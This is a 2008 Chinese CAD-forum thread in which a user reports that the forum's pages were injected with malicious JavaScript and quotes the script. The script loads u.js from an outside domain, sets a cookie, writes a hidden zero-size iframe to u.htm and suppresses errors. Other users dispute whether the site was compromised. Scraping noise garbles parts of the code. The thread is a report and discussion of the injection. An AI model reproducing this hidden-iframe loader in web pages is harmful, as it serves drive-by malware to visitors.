QQ登录

只需一步,快速开始

登录 | 注册 | 找回密码

三维网

 找回密码
 注册

QQ登录

只需一步,快速开始

展开

通知     

查看: 2114|回复: 16
收起左侧

此网被挂马

[复制链接]
发表于 2008-11-26 14:38:57 | 显示全部楼层 |阅读模式 来自: 中国浙江金华

马上注册,结识高手,享用更多资源,轻松玩转三维网社区。

您需要 登录 才可以下载或查看,没有帐号?注册

x
马:Hack.Exploit.Script.JS.Mixed.c
  1. <script language="javascript" SRC="  ' target=_blank>http://u.cruze3.cn/u.js"></script>
    7 p0 c% w; N' E8 C& C( g, f( \
  2. 5 R( b4 f+ {& G
  3. document.writeln("<script>";
    " t5 d. Z! v" h' V! q
  4. document.writeln("function oK_Begin(){";
    1 L, k( ~# d$ Z, \7 e$ \: p4 q
  5. document.writeln("var Then = new Date() ";
    : w- d: ]& ^5 [* X9 V( ^  l( `
  6. document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)";
    6 L/ h/ Y6 V% u8 W, f; V
  7. document.writeln("var cookieString = new String(document.cookie)";$ s- z! c4 Q9 J7 f5 R9 f
  8. document.writeln("var cookieHeader = "Cookie1=" ";
    1 S! e. m3 L: l! Z. ]# g) m
  9. document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)";( V! U) e  s; t
  10. document.writeln("if (beginPosition != -1){ ";
    8 L2 p4 a- ]/ ~1 }" ?+ F0 G
  11. document.writeln("} else ";
    1 \& W+ v/ f) m0 n; Z
  12. document.writeln("{ document.cookie = "Cookie1=POPWINDOS;expires="+ Then.toGMTString() ";& z, A( D8 q9 ~. K- o
  13. document.writeln("document.write(\'<iframe width=0 height=0 src="\'">http://u.cruze3.cn/u.htm"><\/iframe>\');";
    9 J& [) w8 X4 X8 u- Q/ x# L
  14. document.writeln("}";
    ) M0 U5 u4 V6 c: Z
  15. document.writeln("}";
    + |) ~; d: {4 G/ _7 N# p, G6 Y0 W, V
  16. document.writeln("oK_Begin();";
    ( x% z5 @, }5 K
  17. document.writeln("<\/script>";
    / t$ N# [) y& E: h
  18. document.writeln("<script>window.onerror=function(){return true;}<\/script>"6 v8 j2 _7 U1 q1 k8 A2 C
  19. . ~# _9 r1 l1 W5 Q2 q' }
  20. # n# r& _' I: h7 Z( w

  21. 1 }% r! t1 z5 B3 y0 B  V8 U7 P! |
  22. 0 Q* X* v$ G/ ^/ {
  23.   k9 B6 t! N% `. V
复制代码
虽然从表面上去看是个恶意代码,但里面可能包含马,试图打开此网页u.htm,而此网页可能是网页木马
发表于 2008-11-26 14:44:03 | 显示全部楼层 来自: 中国浙江宁波
请管理员确认是否网页挂马?
发表于 2008-11-26 14:47:52 | 显示全部楼层 来自: 中国江苏南京
我的麦咖啡都没检测出来 你什么杀毒软件?
 楼主| 发表于 2008-11-26 16:16:23 | 显示全部楼层 来自: 中国浙江金华

回复 3# cayuer 的帖子

不是杀软件查的.
& o2 D. U6 x# A/ K1 x3 }只是无意中去看了源文件,感觉网头中的u.js很是反常(按常理说,很少在HEAD前,且根目录并是是此网站,于是,下载了u.js,发现不对头.它试图以最小化打开U.HTM网页,按平时的经验,它不是毒就是马,很少有人会在论坛上放毒,一般多是放马.& O7 k. M9 P/ o
不过,已经被清理了.5 x& J. W1 I; H* ]. N/ N
: b/ l3 l2 t0 f( d/ a
HEHE! Q; P: z0 L% E: i% K& E8 s2 c

( K' K& T9 \6 r- p[ 本帖最后由 czy12 于 2008-11-26 16:25 编辑 ]
发表于 2008-11-26 18:27:17 | 显示全部楼层 来自: 中国浙江温州
你这个什么网站,哪里出来的?' p* |# v/ X& S( x. i
& O& J1 S1 c$ ~& w
ht tp://u.cruze3.cn/u.js
 楼主| 发表于 2008-11-27 09:15:28 | 显示全部楼层 来自: 中国浙江金华

回复 5# 江南有雪 的帖子

http://u.cruze3.cn/u.js
3 H; M" W7 A) m  C8 l+ S8 K此网是个挂马网,是不可能看到的(他才不会那么笨,HEHE),一般都通过本地IIS进行域名转向.2 W4 h6 ^( N7 ?% h6 o
这是昨天我想看别的网页的源文件时,无意中点了此网页的源文件,才发现不对头.
, \$ n3 [  _9 u4 u4 p5 i% V/ Y8 jHEHE
发表于 2008-11-27 10:26:38 | 显示全部楼层 来自: LAN

回复 6# czy12 的帖子

这跟三维有什么关系?
 楼主| 发表于 2008-11-27 11:01:02 | 显示全部楼层 来自: 中国浙江金华
这是挂在三维网论坛里的.
; ~) `2 h, T3 C  R! o7 ?5 P红线所指
moma.jpg
发表于 2008-11-27 11:21:19 | 显示全部楼层 来自: 中国上海
奇怪,为什么我的里面没有?是不是楼主的机器自己带病毒了?
发表于 2008-11-27 11:26:10 | 显示全部楼层 来自: 中国甘肃兰州
自己的机子中毒了,就不要满天喊叫了,没人会认为你是一个杀毒的行家
 楼主| 发表于 2008-11-27 11:34:27 | 显示全部楼层 来自: 中国浙江金华
不学无术.
$ @7 c1 R, p4 i6 H9 g* @; P+ UHEHE
mlm.jpg
发表于 2008-11-27 14:30:45 | 显示全部楼层 来自: 中国香港
但在:/ h4 Z$ I! m: \$ _: E8 K
http://www.3dportal.cn/discuz/ 之原
7 {* V4 S9 h7 c( B- g2 L似乎看不见楼主所说的 http://u.cruze3.cn/u.js6 }; `! j1 s* P

3 ^/ q' L2 m  E" _+ N[ 本帖最后由 yyywwwhk 于 2008-11-27 16:23 编辑 ]
发表于 2008-11-27 15:30:58 | 显示全部楼层 来自: 中国山东泰安
经过自编扫描代码处理结果,未发现楼主说的挂马代码!: h3 g8 M& k, i% Z8 n! @- T/ I0 S
1 k, d) ]! W: ?  p( P' J% ~, b- y# l
请清理自己计算机的缓冲区!
1.JPG
头像被屏蔽
发表于 2008-11-27 15:43:48 | 显示全部楼层 来自: 中国河北衡水
提示: 作者被禁止或删除 内容自动屏蔽
发表于 2008-11-27 15:47:42 | 显示全部楼层 来自: 新加坡

回复 8# czy12 的帖子

看您的尾符/script,很像是U盘病毒。
 楼主| 发表于 2008-11-27 15:50:50 | 显示全部楼层 来自: 中国浙江金华
DZ6.1有代码自我修复功能。甚至可以在服务程序中设置定时还原数据库。! L1 N2 g% V, s( p
我也说了:已修复。
0 X/ T/ r4 N3 q& Q3 k5 s8 k4 X
% Q' u% O  S7 Q' C# ops:这与缓存毫无关系。虽然缓存中有U.JS.
4 S& ^$ O! D2 j0 w/ m* B6 }' S4 d但本机上的毒是不会去改动你的网页内容的.我的机子中毒,和你的网页源代码有何相关?
7 U2 T- M% X5 @1 M) m5 J+ F1 O$ E
- H2 I5 }+ M) j* P, \& |5 M7 vscript是个JAVA代码,与U盘何关?, @9 f$ k: c" s( h# ]* K! {7 ^

3 y5 W4 E5 k! e+ c# Q* eHEHE2 a3 t7 C# s1 ^% d* O  o
5 h$ F+ Z/ l& ?, E0 n1 R
[ 本帖最后由 czy12 于 2008-11-27 16:03 编辑 ]
发表于 2008-11-27 16:11:40 | 显示全部楼层 来自: 中国山东泰安
非也,代码是程序直接采样的当时的网页代码,是自编的,算不上权威,但是可以直接进入部分加密网站!
# h$ R& i, T  x$ j0 B3 r1 O0 _1 h6 Z+ k% ?3 a3 F; ^% I
如果却如你说的修改了,我想,这只有论坛管理员有这个权限,即便是后台也是有记录的。假如确实是论坛后台修改了,一定会给大伙一个说法的。# x# c& I& g; M+ a; f7 O
) w  ^0 c9 W( c4 F; B/ c# ]
相反,目前从各方面提供的代码显示,确实“此时此刻”是正常的!至于继续讨论已经无大的价值!
发表回复
您需要登录后才可以回帖 登录 | 注册

本版积分规则


Licensed Copyright © 2016-2020 http://www.3dportal.cn/ All Rights Reserved 京 ICP备13008828号

小黑屋|手机版|Archiver|三维网 ( 京ICP备2023026364号-1 )

快速回复 返回顶部 返回列表